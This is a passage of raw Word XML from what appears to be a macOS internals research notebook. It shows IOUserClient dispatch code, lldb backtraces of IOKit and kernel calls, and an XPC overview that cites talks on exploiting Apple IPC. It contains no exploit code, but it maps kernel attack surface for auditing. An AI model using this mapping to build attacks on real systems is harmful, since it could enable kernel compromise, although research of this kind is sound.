    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    X0: input, inputCount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">if( method-&gt;count1)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if( method-&gt;count0)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err = (object-&gt;*func)( input, output,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                        (void *)(uintptr_t)inputCount, outputCount, 0, 0 );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        } </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        else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err = (object-&gt;*func)( output, outputCount, 0, 0, 0, 0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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    else </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        err = (object-&gt;*func)( input, (void *)(uintptr_t)inputCount, 0, 0, 0, 0 );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13B62" w:rsidRPr="00F13B62" w:rsidRDefault="00F13B62" w:rsidP="00F13B62">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13B62">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003475D0" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="153" w:name="_Toc445313355"/>
      <w:r w:rsidR="00F416BD">
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00F416BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ser mode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
      <w:r w:rsidR="00F416BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRPr="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="003475D0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pP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999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F416BD">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bt</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thread #7: tid = 0x91bd, 0x00007fff93d490a0 libsystem_kernel.dylib`mach_msg, stop reason = breakpoint 2.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 frame #0: 0x00007fff93d490a0 libsystem_kernel.dylib`mach_msg</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 0x00007fff8a0d5cf3 IOKit`io_connect_method + 384</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2: 0x00007fff8a078804 IOKit`IOConnectCallMethod + 34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3: 0x00007fff9414844a IOSurface`IOSurfaceClientLookupFromMachPort + 18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4: 0x00007fff94148b1c IOSurface`IOSurfaceLookupFromMachPort + 1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5: 0x000000011290cf6f AppleCamera`___lldb_unnamed_function191$$AppleCamera + 1439</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6: 0x00007fff90fdb242 CoreFoundation`__CFMachPortPerform + 290</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7: 0x00007fff90fdb109 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE1_PERFORM_FUNCTION__ + 4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8: 0x00007fff90fdb079 CoreFoundation`__CFRunLoopDoSource1 + 473</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9: 0x00007fff90fd2aab CoreFoundation`__CFRunLoopRun + 217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0: 0x00007fff90fd1fc8 CoreFoundation`CFRunLoopRunSpecific + 296</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1: 0x00007fff91013961 CoreFoundation`CFRunLoopRun + 97</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2: 0x0000000112910ce6 AppleCamera`___lldb_unnamed_function336$$AppleCamera + 106</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3: 0x00007fff8a8c69b1 libsystem_pthread.dylib`_pthread_body + 13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4: 0x00007fff8a8c692e libsystem_pthread.dylib`_pthread_start + 168</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F416BD">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #15: 0x00007fff8a8c4385 libsystem_pthread.dylib`thread_start + 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRPr="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00F416BD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416BD">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(lldb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00925D66" w:rsidRDefault="00925D66" w:rsidP="009F6926"/>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00DE2CC5" w:rsidP="00F416BD">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kernel</w:t>
      </w:r>
      <w:r w:rsidR="00F416BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode </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Pr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2CC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2CC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE2CC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b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thread #1: tid = 0x0000, 0xffffff7f9c41192c IOHDIXController`IOHDIXHDDriveOutKernel::processReply(HDIReplyOOL64 const*, IOMemoryDescriptor*) + 302, stop reason = signal SIGSTOP</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 frame #0: 0xffffff7f9c41192c IOHDIXController`IOHDIXHDDriveOutKernel::processReply(HDIReplyOOL64 const*, IOMemoryDescriptor*) + 302</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1: 0xffffff7f9c412c7d IOHDIXController`IOHDIXHDDriveOutKernelUserClient::processReply64(HDIReplyOOL64 const*) + 225</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2: 0xffffff801b6bdc32 kernel.development`::shim_io_connect_method_structureI_structureO(method=&lt;unavailable&gt;, object=&lt;unavailable&gt;, input=&lt;unavailable&gt;, inputCount=&lt;unavailable&gt;, output=&lt;unavailable&gt;, outputCount=&lt;unavailable&gt;) + 290 at IOUserClient.cpp:4443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3: 0xffffff801b6be8aa kernel.development`IOUserClient::externalMethod(this=&lt;unavailable&gt;, selector=&lt;unavailable&gt;, args=0xffffff912786bc00, dispatch=&lt;unavailable&gt;, target=&lt;unavailable&gt;, reference=&lt;unavailable&gt;) + 842 at IOUserClient.cpp:5001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4: 0xffffff801b6bb917 kernel.development`::is_io_connect_method(connection=0xffffff912786bc60, selector=2, scalar_input=&lt;unavailable&gt;, scalar_inputCnt=&lt;unavailable&gt;, inband_input=&lt;unavailable&gt;, inband_inputCnt=52, ool_input=&lt;unavailable&gt;, ool_input_size=&lt;unavailable&gt;, inband_output=&lt;unavailable&gt;, inband_outputCnt=&lt;unavailable&gt;, scalar_output=&lt;unavailable&gt;, scalar_outputCnt=&lt;unavailable&gt;, ool_output=&lt;unavailable&gt;, ool_output_size=&lt;unavailable&gt;) + 487 at IOUserClient.cpp:3593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5: 0xffffff801b163750 kernel.development`_Xio_connect_method(InHeadP=&lt;unavailable&gt;, OutHeadP=0xffffff80388bd5d0) + 384 at device_server.c:8255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6: 0xffffff801b092963 kernel.development`ipc_kobject_server(request=0xffffff8038ce6c00) + 259 at ipc_kobject.c:339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7: 0xffffff801b06e6f3 kernel.development`ipc_kmsg_send(kmsg=&lt;unavailable&gt;, option=&lt;unavailable&gt;, send_timeout=0) + 195 at ipc_kmsg.c:1440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8: 0xffffff801b085035 kernel.development`mach_msg_overwrite_trap(args=&lt;unavailable&gt;) + 197 at mach_msg.c:470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9: 0xffffff801b189cc0 kernel.development`mach_call_munger64(state=0xffffff802f7c9880) + 480 at bsd_i386.c:560 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE2CC5" w:rsidRPr="00DE2CC5" w:rsidRDefault="00DE2CC5" w:rsidP="00DE2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1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2CC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #10: 0xffffff801b1bf436 kernel.development`hndl_mach_scall64 + 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00DE2CC5" w:rsidP="00DE2CC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2CC5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(lldb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177C70" w:rsidRDefault="00177C70" w:rsidP="00DE2CC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177C70" w:rsidRPr="00177C70" w:rsidRDefault="00177C70" w:rsidP="00DE2CC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177C70" w:rsidRPr="00177C70" w:rsidRDefault="00177C70" w:rsidP="00DE2CC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00177C70">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b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thread #3: tid = 0x2e47, 0xffffff801235f335 kernel.development`_Xio_connect_map_memory(InHeadP=0xffffff801db75070, OutHeadP=0xffffff801c3b8688) + 21 at device_server.c:2634, name = '0xffffff801af28c88', queue = '0x0', stop reason = breakpoint 2.1</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 frame #0: 0xffffff801235f335 kernel.development`_Xio_connect_map_memory(InHeadP=0xffffff801db75070, OutHeadP=0xffffff801c3b8688) + 21 at device_server.c:2634 [op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frame #1: 0xffffff8012292963 kernel.development`ipc_kobject_server(request=0xffffff801db75000) + 259 at ipc_kobject.c:339 [op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frame #2: 0xffffff801226e6f3 kernel.development`ipc_kmsg_send(kmsg=&lt;unavailable&gt;, option=&lt;unavailable&gt;, send_timeout=0) + 195 at ipc_kmsg.c:1440 [op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frame #3: 0xffffff8012285035 kernel.development`mach_msg_overwrite_trap(args=&lt;unavailable&gt;) + 197 at mach_msg.c:470 [op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frame #4: 0xffffff8012389a4e kernel.development`mach_call_munger(state=0xffffff801c2db960) + 446 at bsd_i386.c:472 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177C70" w:rsidRPr="00177C70" w:rsidRDefault="00177C70" w:rsidP="0017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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00177C70">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #5: 0xffffff80123bf1e8 kernel.development`hndl_mach_scall + 216</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177C70" w:rsidRDefault="00177C70" w:rsidP="00177C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00177C70">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(lldb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80A03" w:rsidRDefault="00A80A03" w:rsidP="00177C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A80A03" w:rsidRDefault="00A80A03" w:rsidP="00177C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A80A03" w:rsidRDefault="00A80A03" w:rsidP="00A80A03">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Toc445313356"/>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o_service_get_matching_services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80A03" w:rsidRPr="00A80A03" w:rsidRDefault="00A80A03" w:rsidP="00177C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A80A03" w:rsidRPr="00A80A03" w:rsidRDefault="00A80A03" w:rsidP="00177C70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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999999"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00A80A03">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b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thread #4: tid = 0x083c, 0xffffff8011e336a6 kernel.development`OSUnserializeXML(buffer="?, bufferSize=52, errorString=0x0000000000000000) + 6 at OSUnserializeXML.y:1216, name = '0xffffff80196cc5d8', queue = '0x0', stop reason = breakpoint 7.2 8.2</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 frame #0: 0xffffff8011e336a6 kernel.development`OSUnserializeXML(buffer="?, bufferSize=52, errorString=0x0000000000000000) + 6 at OSUnserializeXML.y:1216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1: 0xffffff8011ebcd76 kernel.development`internal_io_service_get_matching_services(master_port=&lt;unavailable&gt;, matching=&lt;unavailable&gt;, matching_size=&lt;unavailable&gt;, existing=0xffffff887bdabe18) + 54 at IOUserClient.cpp:1893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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #2: 0xffffff801195dc15 kernel.development`_Xio_service_get_matching_services_bin [inlined] is_io_service_get_matching_services_bin(master_port=&lt;unavailable&gt;, matching=&lt;unavailable&gt;, matchingCnt=&lt;unavailable&gt;, existing=&lt;unavailable&gt;) + 101 at IOUserClient.cpp:1948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3: 0xffffff801195dc0d kernel.development`_Xio_service_get_matching_services_bin(InHeadP=&lt;unavailable&gt;, OutHeadP=0xffffff801c5d4888) + 93 at device_server.c:10589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4: 0xffffff8011887f73 kernel.development`ipc_kobject_server(request=0xffffff801a84e000) + 259 at ipc_kobject.c:340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5: 0xffffff8011863ea3 kernel.development`ipc_kmsg_send(kmsg=&lt;unavailable&gt;, option=&lt;unavailable&gt;, send_timeout=0) + 195 at ipc_kmsg.c:1441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6: 0xffffff801187a4c5 kernel.development`mach_msg_overwrite_trap(args=&lt;unavailable&gt;) + 197 at mach_msg.c:470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7: 0xffffff80119828e0 kernel.development`mach_call_munger64(state=0xffffff8019625fc0) + 480 at bsd_i386.c:560 [opt]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80A03" w:rsidRPr="00A80A03" w:rsidRDefault="00A80A03" w:rsidP="00A8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0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80A03">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #8: 0xffffff80119b85a6 kernel.development`hndl_mach_scall64 + 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80A03" w:rsidRPr="00A80A03" w:rsidRDefault="00A80A03" w:rsidP="00177C70">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F416BD" w:rsidRDefault="00F416BD" w:rsidP="00B65EF6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc445313357"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D0E0F" w:rsidRPr="006D0E0F" w:rsidRDefault="00995B76" w:rsidP="006D0E0F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\usr\lib\system\libxpc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B65EF6" w:rsidRDefault="00B65EF6" w:rsidP="00B65EF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="_Toc445313358"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D0E0F" w:rsidRDefault="006D0E0F" w:rsidP="006D0E0F">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0591255E" wp14:editId="2C5344D1">
            <wp:extent cx="5274310" cy="284226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842267"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D0E0F" w:rsidRDefault="006D0E0F" w:rsidP="006D0E0F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  XPC services API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006865D3" w:rsidRDefault="006865D3" w:rsidP="006865D3">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1183CC36" wp14:editId="083DF5A2">
            <wp:extent cx="5274310" cy="117023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70238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006865D3" w:rsidRDefault="006865D3" w:rsidP="006865D3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XPC dataflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006865D3" w:rsidRDefault="006865D3" w:rsidP="006865D3">
      <w:r w:rsidRPr="006865D3">
        <w:t>us-15-Wang-Review-And-Exploit-Neglected-Attack-Surface-In-iOS-8.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006865D3" w:rsidRPr="006865D3" w:rsidRDefault="006865D3" w:rsidP="006865D3"/>
    <w:p w:rsidR="006D0E0F" w:rsidRPr="006D0E0F" w:rsidRDefault="006D0E0F" w:rsidP="006D0E0F">
      <w:r w:rsidRPr="006D0E0F">
        <w:t>Auditing and Exploiting Apple IPC-IanBeer_JSS_Slides.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767980" w:rsidRPr="00B65EF6" w:rsidRDefault="00B65EF6" w:rsidP="00B65EF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc445313359"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w:rsidR="00B65EF6" w:rsidRPr="00B65EF6" w:rsidRDefault="00767980" w:rsidP="00B65EF6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular" w:hint="eastAsia"/>
